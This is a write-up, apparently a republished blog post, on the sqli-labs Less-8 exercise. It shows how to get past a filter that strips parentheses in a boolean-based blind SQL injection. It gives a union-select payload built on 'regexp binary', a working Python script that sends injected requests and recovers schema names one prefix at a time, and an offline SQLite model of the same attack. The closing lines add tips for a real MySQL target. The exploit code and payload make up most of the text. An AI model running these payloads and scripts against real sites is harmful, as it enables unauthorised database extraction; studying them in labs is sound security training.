0x00 Environment setup
sqli-labs Less-8 (boolean-based blind). Make one small change to the source and add the following line, so that every `(` and `)` in the injected value is stripped before it reaches the query:
$id=preg_replace('/\(|\)/', "",$id); // filter parentheses
0x01 Writing the script
1. Construct the payload
'union select 1,2,3 from information_schema.tables where table_schema regexp binary'^%s.*$' -- -
The usual character-by-character extraction functions (substr(), mid(), ascii()) all need parentheses and are therefore killed by the filter. `regexp` is an operator, not a function, so `^prefix.*$` lets us ask "does some schema name start with this prefix?" without a single parenthesis; `binary` makes the match case-sensitive. Since Less-8 prints "You are in" only when the query returns a row, the union branch returns rows exactly when the regexp matches.
2. The script:
```python
# coding=utf-8
from urllib.parse import quote
from urllib.request import urlopen

url = "http://127.0.0.1/sqli-labs-master/Less-8/?id=1%s"
# test payload: only the regexp prefix changes from request to request
payload = "'and 1=2 union select 1,2,3 from information_schema.tables where table_schema regexp binary'^%s.*$'-- -"
# simple test charset; string.printable works too, but then the quote character
# must be dropped and regexp metacharacters (. * $ ...) must be escaped
charset = 'abcdefghijklmnopqrstuvwxyz'

# recursive prefix walk: every prefix that still matches some schema name
# is printed and then extended by one more character
def check(prefix):
    for ch in charset:
        injected = payload % (prefix + ch)
        if check1(injected):
            print(prefix + ch)
            check(prefix + ch)

# does the page take the "true" branch for this payload?
def check1(injected):
    # quote() because urllib in Python 3 rejects raw spaces in the URL
    resp = urlopen(url % quote(injected)).read().decode('utf-8', 'ignore')
    return "You are in" in resp

if __name__ == "__main__":
    check("")
```
Partial output of running the script:
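The whole chain, filter included, can be run offline. The following is an added example, not code from the original post: an in-memory SQLite database stands in for the lab (a `users` table plus a constructed `schema_tables` table shaped like `information_schema.tables`, both assumed), a Python-backed `REGEXP` function replaces MySQL's `regexp binary`, and `oracle()` reproduces the patched page (parentheses stripped, value spliced into the query unescaped, only "row or no row" revealed). `extract_names()` goes one step beyond the script above: in addition to extending each prefix with `^prefix.*$` it probes `^prefix$`, so it returns the complete names rather than printing every intermediate prefix, and it escapes regexp metacharacters so the alphabet can be widened safely.

```python
import re
import sqlite3
import string

# Constructed sample data standing in for information_schema.tables.table_schema
# (not from the original post); the walk below should recover all four names.
SCHEMAS = ["information_schema", "challenges", "mysql", "security"]

# Characters MySQL allows in unquoted identifiers. Widening this to
# string.printable, as the post suggests, means dropping the SQL quote
# character and relying on escape_for_regexp for the metacharacters.
ALPHABET = string.ascii_letters + string.digits + "_"


def _regexp(pattern, value):
    # SQLite has no built-in REGEXP; Python's re module fills in. re.search is
    # case-sensitive, which is what `regexp binary` gives you in MySQL.
    return value is not None and re.search(pattern, value) is not None


def build_db():
    """In-memory SQLite database modelling the Less-8 users table plus a
    table shaped like information_schema.tables (assumed layout)."""
    con = sqlite3.connect(":memory:")
    con.create_function("REGEXP", 2, _regexp)
    con.execute("create table users(id integer, username text, password text)")
    con.execute("insert into users values (1, 'Dumb', 'Dumb')")
    con.execute("create table schema_tables(table_schema text, table_name text)")
    con.executemany("insert into schema_tables values (?, ?)",
                    [(s, "users") for s in SCHEMAS])
    return con


def oracle(con, user_id):
    """Model of the patched Less-8 page: strip parentheses exactly as the PHP
    preg_replace does, splice the value into the query unescaped, and reveal
    only whether a row came back (the 'You are in' branch)."""
    user_id = user_id.replace("(", "").replace(")", "")
    sql = "select * from users where id='%s' limit 0,1" % user_id
    try:
        return con.execute(sql).fetchone() is not None
    except sqlite3.OperationalError:
        # a query broken by the filter renders the same page as a false condition
        return False


# Adapted from the post's payload (table name and `binary` differ for SQLite);
# the whole regexp is substituted for %s.
PAYLOAD = ("' and 1=2 union select 1,2,3 from schema_tables "
           "where table_schema regexp '%s' -- -")


def escape_for_regexp(text):
    # Letters, digits and '_' pass through; anything else (. $ * ...) gets a
    # backslash so it matches literally. Inside a MySQL string literal the
    # backslash itself must be doubled, which this SQLite model does not need.
    return re.escape(text)


def extract_names(ask, alphabet=ALPHABET):
    """Depth-first walk over the prefix trie of every value in the column.
    ask(pattern) is the boolean oracle: True iff some row matches.
    Besides extending a prefix with '^prefix.*$' it probes '^prefix$', so
    complete names come back as a set."""
    found = set()

    def walk(prefix):
        if prefix and ask("^%s$" % escape_for_regexp(prefix)):
            found.add(prefix)
        for ch in alphabet:
            candidate = prefix + ch
            if ask("^%s.*$" % escape_for_regexp(candidate)):
                walk(candidate)

    walk("")
    return found


def run_demo():
    """Wire the oracle to the extraction; returns (names, number of requests)."""
    con = build_db()
    requests = [0]

    def ask(pattern):
        requests[0] += 1
        # same shape as the script's URL: the literal id 1 followed by the payload
        return oracle(con, "1" + PAYLOAD % pattern)

    return extract_names(ask), requests[0]


if __name__ == "__main__":
    names, n = run_demo()
    print("%d requests, recovered: %s" % (n, sorted(names)))
```

The request count printed by `run_demo()` is the practical cost of this technique: one request per alphabet character per recovered prefix, which is why the post's narrow lowercase charset is a reasonable first pass before switching to the full identifier alphabet. Against a real MySQL target, keep `regexp binary` and remember that a backslash inside a MySQL string literal has to be written as `\\`.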
Source: http://www.bubuko.com/infodetail-2550388.html